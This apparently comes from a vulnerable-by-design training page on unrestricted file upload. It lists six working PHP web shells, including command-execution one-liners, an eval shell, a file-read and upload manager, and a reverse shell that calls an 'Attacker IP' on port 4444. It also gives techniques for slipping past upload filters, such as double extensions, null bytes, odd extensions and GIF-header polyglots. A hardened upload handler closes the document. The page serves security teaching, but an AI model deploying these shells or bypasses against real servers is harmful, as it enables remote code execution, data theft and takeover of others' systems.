Unrestricted File Upload (No Validation)
Upload any file type - PHP shells, executables, anything!
🔥 PHP Web Shell Examples:
1. Simple PHP Shell (shell.php):
<?php system($_GET['cmd']); ?>
Usage: shell.php?cmd=whoami
2. Advanced PHP Shell (advanced_shell.php):
<?php
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
<html>
<body>
  <form method="POST">
    <input type="text" name="cmd" placeholder="Enter command">
    <input type="submit" value="Execute">
  </form>
</body>
</html>
3. PHP File Manager Shell (filemanager.php):
<?php
if (isset($_GET['file'])) {
    echo file_get_contents($_GET['file']);
}
if (isset($_POST['upload'])) {
    move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']);
}
?>
<form method="POST" enctype="multipart/form-data">
  <input type="file" name="f">
  <input type="submit" name="upload" value="Upload">
</form>
4. PHP Reverse Shell:
<?php
$ip = '10.0.0.1'; // Attacker IP
$port = 4444; // Attacker Port
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>
5. One-liner PHP Shell:
<?php eval($_POST['cmd']); ?>
6. PHP Info Shell:
<?php phpinfo(); system($_GET['c']); ?>
Bypass Techniques:
• Double extensions: shell.php.jpg
• Null byte: shell.php%00.jpg
• Case manipulation: shell.PhP
• Alternative extensions: .php3, .php4, .php5, .phtml, .phar
• Content-Type manipulation
• Add GIF header: GIF89a<?php system($_GET['cmd']); ?>
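For contrast with the unvalidated handlers above, here is an upload handler that closes each bypass in the list. It is an added example, not part of the original page; store_upload(), ALLOWED and the /var/uploads directory are assumptions, and 'f' is the form field name the file manager form uses.

```php
<?php
// Added example, not from the original page. store_upload(), ALLOWED and
// /var/uploads are assumptions; 'f' is the form field name used above.
const ALLOWED = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

function store_upload(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    $name = (string) $file['name'];
    // Null byte (shell.php%00.jpg): refuse control characters outright.
    if (preg_match('/[\x00-\x1f]/', $name)) {
        throw new RuntimeException('bad filename');
    }
    // Case manipulation (shell.PhP) and alternative extensions (.phtml,
    // .phar, ...): lower-case the last extension and check an allowlist,
    // so anything not explicitly listed is refused.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // Content-Type manipulation: $file['type'] is client-supplied, so it is
    // ignored; the type is sniffed from the bytes and must match the extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Double extension (shell.php.jpg) and GIF header + PHP: a polyglot can
    // pass the sniff above, so the client name is discarded. The file gets a
    // random name with one allowlisted extension, in a directory outside
    // the web root, where the server never hands it to the PHP interpreter.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], "$destDir/$stored")) {
        throw new RuntimeException('could not store file');
    }
    return $stored;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['f'])) {
    try {
        echo 'stored as ', store_upload($_FILES['f'], '/var/uploads');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ', $e->getMessage();
    }
}
```

The content sniff alone does not stop a file that starts with a valid GIF header; the storage location and the server-generated name are what keep such a file from ever being executed.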